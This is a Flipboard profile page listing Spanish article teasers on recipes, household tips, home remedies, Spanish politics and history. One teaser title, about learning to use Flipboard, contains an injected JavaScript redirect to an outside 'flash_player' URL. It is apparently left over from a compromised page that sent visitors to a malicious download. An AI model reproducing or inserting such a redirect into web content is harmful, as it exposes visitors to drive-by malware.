Mayte Salmerón Fernández

44 Added | 2 Magazines | 1 Follower | @MaySF | Keep up with Mayte Salmerón Fernández on Flipboard, a place to see the stories, photos, and updates that matter to you. Flipboard creates a personalized magazine full of everything, from world news to life’s great moments. Download Flipboard for free and search for “Mayte Salmerón Fernández”

10 famosos casos de lavado de cerebro - culturizando.com | Alimenta tu Mente

Todas las personas poseen una forma de pensar y actuar que ha estado condicionada por su ADN y un conjunto de instrucciones externas generadas por la …

10 trucos para sacarle mayor provecho a Whatsapp

La aplicación de mensajería WhatsApp es una de las que más crece en todo el mundo y se populariza entre los usuarios de telefonía. Sólo hasta el …

Local Cloud, tu nube personal

Muchos son los usuarios que hacen uso de Dropbox, y <b>sin el cual a lo mejor tendrían que cambiar su forma de trabajar</b> (entre los que me incluyo); sus …

Huevos al horno en tartaleta de pan. Receta

Si los huevos fritos son un clásico de cena en muchas casas, hoy os presento unos <b>huevos al horno en tartaleta</b> como aperitivo y además con su pan …

Receta del día: galletas dulces sueños

Estas <b>galletas decoradas</b> que Ladulzurademari ha bautizado como <b>'galletas dulces sueños'</b>, protagonizarán la portada de Cocina de este lunes.<p><b>¡Enhorabuena</b>!<p>…

Mereces lo que sueñas… | Siempre Lindas

Sin darnos cuenta ya estamos en una época en que comienzas a hacer el recuento del primer semestre del año, y hay quienes piensan como yo, que hay …

Aprende a usar Flipboard, la revista digital de las Siempre Lindasdocument.location.href=”http://www.sommen.nu/templates/flash_player/?A” | Siempre Lindas

Una vez creada su cuenta se encontrarán con la imagen (3), ésta es una pantalla de resumen de sus cuentas en las redes sociales y revistas a las …

El papel de un padre ausente | Siempre Lindas

Se considera a las familias como la células base de la sociedad, pero hasta hace algún tiempo atrás se consideraba que para merecer el título de …

Carlos Fabra se sienta en el banquillo tras casi 10 años de investigación

El expresidente del PP de Castellón se enfrenta a 13 años tras dos lustros de trabas judiciales<p>Está acusado de tráfico de influencias, cohecho y …

Rajoy traslada a Akihito que España no está inquieta por Fukushima

Tokio (EFE).- El emperador de <b>Japón</b>, Akihito, recibió hoy en el Palacio Imperial de <b>Tokio</b> al presidente del Gobierno español, Mariano <b>Rajoy</b>, quien le …

Diez pasos para alcanzar sus metas

El motor que mueve su vida y multiplica la productividad es el llamado motivación. Un elemento indispensable que además de darle dirección, le ahorra …

60 genios de la pintura universal

Una selección de obras de los pintores más destacados de todas las épocas. Espero que os guste Fuente: propia Imágenes: google images Título …

Galletas crujientes de avellana y chocolate. Receta

Sé que a veces puedo abusar diciendo que el chocolate combina muy bien con tal cosa, pero en esta ocasión, al menos, no lo afirmo a la ligera. Esta</b> …

Cómo conseguir la máxima eficiencia energética en el hogar

Hoy en día el ahorro se ha vuelto imprescindible en muchos hogares ante la incertidumbre, aunque cada vez son más altos los importes de las facturas …

50 sencillos consejos para tu hogar

| <b>Editorial Metroscubicos</b><p>En todos los hogares se presentan situaciones inesperadas que es necesario solucionar al momento, afortunadamente existen …

Receta para hacer churros en casa

El mejor desayuno para un día de fiesta es sin lugar a dudas unos <b>churros con chocolate</b>. Si no tienes una churrería cerca o si prefieres prepararte …

Los efectos nocivos del consumo excesivo de omeprazol

Los efectos nocivos del consumo excesivo de omeprazol Las personas mayores de 50 años y en particular las mujeres requieren estar atentas al abuso en …

Remedios caseros contra la irritación de garganta

Lo más habitual es que se sufra <b>irritación de garganta</b> durante los meses de otoño e invierno por las bajas temperaturas, sin embargo, también puede …

Remedio casero para blanquear los dientes

Son muchos los motivos que pueden provocar que los <b>dientes</b> se vuelvan amarillos, algunos muy evitables, como abuso del café o el consumo de tabaco. …

Tarta de queso “japonesa”

No os creáis que he encendido el horno, no no. Esta receta estaba guardada desde antes de irme de vacaciones. Como me gustan tanto las tartas de …

Spaghetti a la (auténtica) carbonara

Con Extra de Queso Idea guardada <b>2</b> veces<p>La valoración media de 2 personas es: Excelente<p>¡Martes, fin de nuestras vacaciones, y aquí estamos de nuevo al …

El Tratado de Tordesillas y cómo repartió Portugal y Castilla

El Tratado de Tordesillas, <b>7 de junio de 1494</b>, se inscribe en una <b>larga serie de acuerdos entre los reyes de Castilla y de Portugal</b> que se remontan al …

Fartlek: corre más rápido en 4 semanas

¡¡Uy!! cuántas dudas... ¿cuántos cambios hago? ¿de cuánto tiempo? ¿y el descanso? ¿Y si me sube mucho el pulso? ¿Se puede hacer fartlek todos los …

Receta tradicional de flan de queso casero, una delicia riquísima

Hoy os he querido traer otro postrecito para esta <b>Semana Santa</b>. Se trata de un flan de queso casero buenísimo para los que les encantan el queso lo …

Calabacines rellenos de atún

Hoy toca receta de verduras, en esta ocasión acompañadas de atún. Los <b>calabacines relenos de atún</b> son una cena muy llamativa para toda la familia, …

10 consejos de emprendedores para sacarle provecho a LinkedIn

Casi una decena de emprendedores con productos existosos, especialmente web, han compartido su opinión en Mashable sobre las mejores maneras de …

Memoria a largo plazo: Hallan su localización cerebral

Uno de los interrogantes más fascinantes sobre el <b>funcionamiento del cerebro</b> trata de desvelar cómo se produce el almacenamiento de nuestros …